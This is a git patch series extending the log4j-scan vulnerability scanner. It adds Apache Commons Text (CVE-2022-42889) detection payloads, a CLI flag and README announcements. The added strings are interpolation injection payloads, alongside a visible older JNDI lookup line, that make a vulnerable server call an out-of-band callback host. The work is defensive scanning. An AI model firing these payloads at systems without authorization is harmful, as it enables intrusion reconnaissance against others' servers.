From cfdb9277a89197093d56fb5924efb0640ed1bce6 Mon Sep 17 00:00:00 2001 From: Mazin Ahmed Date: Thu, 20 Oct 2022 18:47:36 +0400 Subject: [PATCH 1/5] initial payloads for cve-2022-42889 --- .gitignore | 3 ++- log4j-scan.py | 27 ++++++++++++++++++++++++++- 2 files changed, 28 insertions(+), 2 deletions(-) diff --git a/.gitignore b/.gitignore index 3d0dbe4..2e5b431 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ -tests/ \ No newline at end of file +tests/ +venv/ \ No newline at end of file diff --git a/log4j-scan.py b/log4j-scan.py index a968253..6119b8e 100755 --- a/log4j-scan.py +++ b/log4j-scan.py @@ -81,6 +81,14 @@ "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}" ] +cve_2022_42889 = [ + "${url:UTF-8::https://{{callback_host}}/}", + "${url:UTF-8::https://{{callback_host}}/{{random}}}", + "${url:UTF-8::http://{{callback_host}}/}", + "${url:UTF-8::http://{{callback_host}}/{{random}}}", + "${dns:address|{{callback_host}}}" + ] + parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", dest="url", @@ -129,6 +137,10 @@ dest="cve_2021_45046", help="Test using payloads for CVE-2021-45046 (detection payloads).", action='store_true') +parser.add_argument("--test-CVE-2022-42889", + dest="cve_2022_42889", + help="Test using payloads for Apache Commons Text RCE (CVE-2022-42889).", + action='store_true') parser.add_argument("--dns-callback-provider", dest="dns_callback_provider", help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].", @@ -197,6 +209,15 @@ def get_cve_2021_45046_payloads(callback_host, random_string): return payloads +def get_cve_2022_42889_payloads(callback_host, random_string): + payloads = [] + for i in cve_2022_42889: + new_payload = i.replace("{{callback_host}}", callback_host) + new_payload = new_payload.replace("{{random}}", random_string) + payloads.append(new_payload) + return payloads + + class Dnslog(object): def __init__(self): self.s = requests.session() @@ -312,7 +333,11 @@ def scan_url(url, callback_host): if args.cve_2021_45046: cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow") - payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string) + payloads.extend(get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)) + + if args.cve_2022_42889: + cprint(f"[•] Scanning for CVE-2022-42889 (Apache Commons Text RCE)", "yellow") + payloads.extend(get_cve_2022_42889_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)) for payload in payloads: cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan") From 5e272c1a0041dd7ff119b70a9da3ae7266e0e311 Mon Sep 17 00:00:00 2001 From: Mazin Ahmed Date: Thu, 20 Oct 2022 18:58:44 +0400 Subject: [PATCH 2/5] updated readme --- README.md | 30 +++++++++++++++++------------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index e0034f4..7aa13d3 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,6 @@ ![](https://dkh9ehwkisc4.cloudfront.net/static/files/80e52a5b-7d72-44c2-8187-76a2a58f5657-demo.png) - # Features - Support for lists of URLs. @@ -14,6 +13,13 @@ - WAF Bypass payloads. --- + +# 🚨 Annoucement (October 20th, 2022) + +FullHunt released an update to identify Apache Commons Text RCE (CVE-2022-42889). Apache Commons Text RCE is highly similar to Log4J RCE, and we recommend patching it as soon as possible. Vulnerable applications allow a full remote-code execution. If help is needed in scanning against this vulnerability on your infrastructure, please get in touch at (team@fullhunt.io). + +![](https://dkh9ehwkisc4.cloudfront.net/static/files/545a0960-3dc4-4157-bf82-c79d0b73a3e7-CVE-2022-42889-demo.png) + # 🚨 Announcement There is a patch bypass on Log4J v2.15.0 that allows a full RCE. FullHunt added community support for log4j-scan to reliably detect CVE-2021-45046. If you're having difficulty discovering and scanning your infrastructure at scale or keeping up with the Log4J threat, please get in touch at (team@fullhunt.io). @@ -28,9 +34,6 @@ We have been researching the Log4J RCE (CVE-2021-44228) since it was released, a It supports DNS OOB callbacks out of the box, there is no need to set up a DNS callback server. - - - # Usage ```python @@ -79,7 +82,6 @@ $ python3 log4j-scan.py -u https://log4j.lab.secbot.local ## Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body) - ```shell $ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests ``` @@ -121,17 +123,19 @@ FullHunt is the next-generation attack surface management platform. FullHunt ena FullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges. # Legal Disclaimer -This project is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. +This project is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. # License -The project is licensed under MIT License. +The project is licensed under MIT License. # Author -*Mazin Ahmed* -* Email: *mazin at FullHunt.io* -* FullHunt: [https://fullhunt.io](https://fullhunt.io) -* Website: [https://mazinahmed.net](https://mazinahmed.net) -* Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) -* Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) + +_Mazin Ahmed_ + +- Email: _mazin at FullHunt.io_ +- FullHunt: [https://fullhunt.io](https://fullhunt.io) +- Website: [https://mazinahmed.net](https://mazinahmed.net) +- Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160) +- Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed) From 601b65fb5cac4b8bd9d88a9671b0d0e183de7807 Mon Sep 17 00:00:00 2001 From: Mazin Ahmed Date: Thu, 20 Oct 2022 19:03:09 +0400 Subject: [PATCH 3/5] Update README.md --- README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7aa13d3..7b99f0b 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ FullHunt released an update to identify Apache Commons Text RCE (CVE-2022-42889) ![](https://dkh9ehwkisc4.cloudfront.net/static/files/545a0960-3dc4-4157-bf82-c79d0b73a3e7-CVE-2022-42889-demo.png) -# 🚨 Announcement +# 🚨 Announcement (December 17th, 2021) There is a patch bypass on Log4J v2.15.0 that allows a full RCE. FullHunt added community support for log4j-scan to reliably detect CVE-2021-45046. If you're having difficulty discovering and scanning your infrastructure at scale or keeping up with the Log4J threat, please get in touch at (team@fullhunt.io). @@ -38,11 +38,12 @@ It supports DNS OOB callbacks out of the box, there is no need to set up a DNS c ```python $ python3 log4j-scan.py -h +python3 log4j-scan.py -h [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. usage: log4j-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] - [--wait-time WAIT_TIME] [--waf-bypass] [--custom-waf-bypass-payload CUSTOM_WAF_BYPASS_PAYLOAD] [--test-CVE-2021-45046] + [--wait-time WAIT_TIME] [--waf-bypass] [--custom-waf-bypass-payload CUSTOM_WAF_BYPASS_PAYLOAD] [--test-CVE-2021-45046] [--test-CVE-2022-42889] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] [--disable-http-redirects] optional arguments: @@ -66,6 +67,8 @@ optional arguments: Test with custom WAF bypass payload. --test-CVE-2021-45046 Test using payloads for CVE-2021-45046 (detection payloads). + --test-CVE-2022-42889 + Test using payloads for Apache Commons Text RCE (CVE-2022-42889). --dns-callback-provider DNS_CALLBACK_PROVIDER DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh]. --custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST From 07f681906543b1717cf60165e47d7b5e62f95ba8 Mon Sep 17 00:00:00 2001 From: Mazin Ahmed Date: Thu, 20 Oct 2022 19:21:43 +0400 Subject: [PATCH 4/5] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7b99f0b..639421f 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ # 🚨 Annoucement (October 20th, 2022) -FullHunt released an update to identify Apache Commons Text RCE (CVE-2022-42889). Apache Commons Text RCE is highly similar to Log4J RCE, and we recommend patching it as soon as possible. Vulnerable applications allow a full remote-code execution. If help is needed in scanning against this vulnerability on your infrastructure, please get in touch at (team@fullhunt.io). +FullHunt released an update to identify Apache Commons Text RCE (CVE-2022-42889). Apache Commons Text RCE is highly similar to Log4J RCE, and we recommend patching it as soon as possible. Vulnerable applications allow a full remote-code execution. If help is needed in scanning and discovering this vulnerability on your infrastructure, please get in touch at (team@fullhunt.io). ![](https://dkh9ehwkisc4.cloudfront.net/static/files/545a0960-3dc4-4157-bf82-c79d0b73a3e7-CVE-2022-42889-demo.png) From 0b8f094a97f00c4483697da82968875f6280f18e Mon Sep 17 00:00:00 2001 From: Mazin Ahmed Date: Thu, 20 Oct 2022 19:29:26 +0400 Subject: [PATCH 5/5] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 639421f..f665392 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ # 🚨 Annoucement (October 20th, 2022) -FullHunt released an update to identify Apache Commons Text RCE (CVE-2022-42889). Apache Commons Text RCE is highly similar to Log4J RCE, and we recommend patching it as soon as possible. Vulnerable applications allow a full remote-code execution. If help is needed in scanning and discovering this vulnerability on your infrastructure, please get in touch at (team@fullhunt.io). +FullHunt released an update to identify Apache Commons Text RCE (CVE-2022-42889). Apache Commons Text RCE is highly similar to Log4J RCE, and we recommend patching it as soon as possible. Vulnerable applications allow full remote-code execution. If help is needed in scanning and discovering this vulnerability on your infrastructure, please get in touch at (team@fullhunt.io). ![](https://dkh9ehwkisc4.cloudfront.net/static/files/545a0960-3dc4-4157-bf82-c79d0b73a3e7-CVE-2022-42889-demo.png)